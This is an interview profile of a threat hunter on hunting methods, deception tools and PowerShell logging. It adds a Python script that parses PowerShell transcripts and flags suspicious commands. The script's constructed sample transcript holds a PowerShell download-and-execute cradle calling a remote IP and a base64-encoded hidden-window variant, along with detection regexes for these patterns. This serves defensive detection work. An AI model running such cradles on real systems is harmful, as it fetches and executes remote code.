Threat Hunter Profile – Matthew Hosburgh
Preferred Datasets: PowerShell transcripts, Sysmon, Firewall & Host logs
Preferred Hunting Techniques: Anomaly Detection & Offensive Countermeasures
Preferred Tools: Carbon Black Response, Security Onion, ADHD & Kibana
Who are you?
I am currently a Cyber Threat Hunter for a Philadelphia-based company called Radian. From a very young age I was interested in not only computers, but the security (or insecurity) of them. I am fortunate enough to have found a career that supports my passion, making my job seem less like a job and more like a paid hobby.
I began my InfoSec career in the military working on various systems and networks supporting the Intelligence Community. After 8 years of active duty, I moved into a civilian role as a Security Analyst supporting a large Government contract. It was in this role where I began my work as a Threat Hunter, although under a slightly different title.
Over the past 3 years, I have been working on the completion of my Master of Science in Information Security Engineering with the SANS Institute. I am on track for a July 2017 graduation date.
What is your experience with Threat Hunting and how did you get started?
I began developing my skillset for hunting back in 2010 while working as a Security Analyst within a 24×7 SOC. From that role, I was promoted into the Critical Security Incident Response Team (CSIRT). In the CSIRT, I primarily worked with incidents or events that did not fit a mold, requiring a great deal of analysis. I would often take Indicators of Compromise (IOCs) to conduct historical searches of the organization’s networks for any indication that an adversary was present. After working at the SOC, I moved into a Security Engineering role for another company where the proactive intrusion analysis was focused on SCADA systems.
There’s something about the active pursuit of an adversary on a network that draws me in. I started hunting because of the detection delta: basically, the time between when an organization is owned and when a system or analyst is notified or made aware of the incident. I believe that the Threat Hunter is one way to reduce the delta and actually find the advanced adversaries faster.
How would you define Threat Hunting?
I would define Threat Hunting as: “the [proactive] pursuit of abnormal activity on servers and endpoints that may be signs of compromise, intrusion, or exfiltration of data [both from external and internal entities].” I have taken Carbon Black’s definition and slightly modified it.
What projects and organizations are you involved with right now?
I am currently building the Threat Hunting Program for Radian. The goal is to align the program with the organization’s objectives and to measure the program’s effectiveness via metrics.
Which of the hunts you’ve carried out was the most interesting or challenging?
As a typical starting point, I categorize my hunting activities into three areas:
- Environmental (what is normal and what is not)
- Pattern based (attack patterns based on past intrusions)
- Threat Intelligence (via feeds or internally generated)
The most challenging and interesting is the threat-intelligence-based hunt. I don’t mean just threat feeds, either. I mean generating real and actionable intelligence that can be consumed by other systems within the organization. This is challenging because it requires the Threat Hunter to have an idea of what the organization is trying to protect and who the organization’s adversaries are. Based on that knowledge, the threat intel priorities can be set. If my goal is to hunt insiders leaking sensitive information, my threat intel would look a lot different than if my priority was on an adversary trying to DDoS the organization.
What hunting techniques, tools, and datasets do you use most frequently?
One method that I’ve been exploring more recently is the use of Offensive Countermeasures. Specifically, I leverage systems that can annoy and/or attribute an adversary. A system from Black Hills InfoSec, dubbed ADHD, includes a plethora of tools that can be leveraged to attribute who is attacking you, and even, who is leaking information. The latest buzzword for these types of systems is decoys or deception platforms, aka honeypots/honeynets, etc. For me, this technique brings the Hunter closer to the adversary and can help generate some very high fidelity threat indicators.
Before these types of tools can be leveraged for Hunting, the Threat Hunter must understand what data the organization is trying to protect and who the adversaries are (or could be). I leverage a method of Threat Modeling in generating this conclusion. What I have found to be most effective is to hold several working groups and ask the participants from a cross section of the organization these foundational questions. The broader the cross-section, the more complete the feedback is. Often this is some of the best threat modeling that can be done because it leverages various expertise and tacit knowledge.
For example, if the result of the Threat Modeling exercise pointed to insiders as the top adversary and confidential data as the “Crown Jewels”, I would leverage ADHD tools to insert web bugs into dummy documents. These web bugs would make a call-back to the Web Bug server when opened, which can be used as an early warning that, somehow, data is leaving the organization. It would further indicate that there is an active insider. The hope is that the insider can be identified before any real sensitive data is exfiltrated. In some cases, this insider might have leaked the data inadvertently. Because of this, once a smaller list of insiders is developed, another tool, known as Molehunt, can hone in on a smaller set of potential insiders to answer the question of inadvertent leak or intentional exfiltration. This all comes back down to the proactive pursuit of adversaries on the network—which can be internal, external, or both.
Security Onion is a great Threat Hunting platform that can rapidly be deployed and leveraged for hunting activities. SO is moving to Elasticsearch and Kibana, which is an exciting advancement. Also, it’s free and open source.
Some of my other favorite datasets include firewall logs combined with host based data (think Sysmon or Carbon Black Response). Also, if you do not have these tools, increasing the logging of PowerShell is a must. Enabling transcription can give a Hunter the exact PowerShell commands and output from those commands.
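Added example (not code from the interview, nor from ADHD, Security Onion or any product named above): a small hunt over a PowerShell transcript of the kind the answer above recommends collecting. It assumes the text layout Windows PowerShell writes when transcription is turned on with invocation headers (the "Command start time" lines), parses the header fields and each command typed at the prompt, and flags commands that match a few hunting rules. The transcript, the rule names and the base64 payload are all constructed for this example.

```python
"""Hunt across a PowerShell transcript (added example; sample input is constructed)."""
import base64
import re
from dataclasses import dataclass, field
from typing import Dict, List

# -EncodedCommand takes base64 over the UTF-16LE bytes of the script, so the
# constructed sample payload is built the same way (not a real adversary command).
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/b.ps1')"
    .encode("utf-16le")).decode("ascii")

# Constructed transcript in the layout PowerShell writes with invocation headers on.
SAMPLE_TRANSCRIPT = r"""**********************
Windows PowerShell transcript start
Start time: 20170301103015
Username: CORP\alice
RunAs User: CORP\alice
Machine: WS01 (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: 4321
**********************
**********************
Command start time: 20170301103020
**********************
PS C:\Users\alice> Get-Process -Name explorer
**********************
Command start time: 20170301103055
**********************
PS C:\Users\alice> IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')
**********************
Command start time: 20170301103112
**********************
PS C:\Users\alice> powershell -nop -w hidden -enc {ENCODED}
**********************
Windows PowerShell transcript end
End time: 20170301103120
**********************
""".replace("{ENCODED}", ENCODED)

HEADER_RE = re.compile(r"^(Start time|Username|RunAs User|Machine|Host Application|Process ID): (.*)$")
CMD_TIME_RE = re.compile(r"^Command start time: (\d{14})$")
PROMPT_RE = re.compile(r"^PS [^>]*>\s?(.*)$")
# -EncodedCommand and the short forms powershell.exe accepts, followed by a base64 blob.
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
RULES = {  # hunting rules, applied to the command line and to any decoded payload
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|Start-BitsTransfer", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
}


@dataclass
class Command:
    start_time: str    # from the invocation header, "" if the transcript lacks it
    text: str          # the command line as typed at the prompt
    decoded: str = ""  # decoded -EncodedCommand payload, if one was found
    findings: List[str] = field(default_factory=list)


@dataclass
class Transcript:
    meta: Dict[str, str]
    commands: List[Command]


def decode_encoded_command(b64: str) -> str:
    """Reverse -EncodedCommand; returns "" when the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except ValueError:
        return ""


def analyze(cmd: Command) -> List[str]:
    """Tag a command with every rule that it, or its decoded payload, matches."""
    texts = [cmd.text]
    m = ENCODED_RE.search(cmd.text)
    if m:
        cmd.findings.append("encoded_command")
        cmd.decoded = decode_encoded_command(m.group(1))
        if cmd.decoded:
            texts.append(cmd.decoded)
    cmd.findings += [name for name, rx in RULES.items() if any(rx.search(t) for t in texts)]
    return cmd.findings


def hunt(text: str) -> Transcript:
    """Parse one transcript file into its header fields plus analyzed commands."""
    meta, commands, pending_time = {}, [], ""
    for line in text.splitlines():
        if m := CMD_TIME_RE.match(line):
            pending_time = m.group(1)
        elif m := PROMPT_RE.match(line):
            commands.append(Command(pending_time, m.group(1).strip()))
        elif (m := HEADER_RE.match(line)) and not commands:
            meta[m.group(1)] = m.group(2).strip()
    for cmd in commands:
        analyze(cmd)
    return Transcript(meta, commands)


def suspicious_commands(transcript: Transcript) -> List[Command]:
    return [c for c in transcript.commands if c.findings]
```

Two practical notes on the data source. The invocation headers parsed here only appear when the Transcription policy has EnableInvocationHeader set (the "Turn on PowerShell Transcription" policy, stored under HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription with EnableTranscripting, EnableInvocationHeader and OutputDirectory). And because the transcript is written by the PowerShell host process under the user's own rights, a user who is also an attacker can delete or edit it: point OutputDirectory at a write-only network share, and pair transcription with script block logging (event ID 4104 in the Microsoft-Windows-PowerShell/Operational log), which records the code itself regardless of how it was encoded on the command line.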
What value do you actively see come out of your hunting activities?
The biggest value I see is the ability to decrease the detection delta, i.e., finding evil on the network. Threat Hunting isn’t just about external entities, however. One great function of Threat Hunting is the ability to find misconfigurations or other issues before they become massive problems for an organization. Back to my definition, Threat Hunting is about proactively finding external and internal threats—even if those threats are self-inflicted.
What types of friendly intelligence are most useful for a hunter to have in an investigation?
The CIS Critical Controls are a brilliant blueprint for understanding what a Threat Hunter needs. I usually start with the first two controls: inventory of authorized and unauthorized devices, and inventory of authorized and unauthorized software. If your organization has a grasp on these, you will be better off when hunting. Another great info source to understand (relates to the 6th control) is what is being logged and how detailed. Also, what isn’t being logged, or where the blind spots are, can help you to understand where additional resources are needed.
What general advice do you have for new Threat Hunters?
Remember, Threat Hunting’s biggest value is when you can spend the time analyzing the anomalies that systems cannot detect. The more time you can spend in this area, the more beneficial you can be as a Hunter. If you find yourself doing repeatable tasks, you should automate them so you can focus on higher level functions.
If you’re new, spend a good deal of time understanding the organization. What are they trying to protect and who are their adversaries? If you understand this up front, you can develop a hunting strategy around the most critical areas and work outwards from there if nothing is found.
What would you like to see Threat Hunting develop into across the industry in the future?
As a necessary role for any organization. It seems like Threat Hunting is becoming a full-time role for many. It’s great the industry is moving towards this.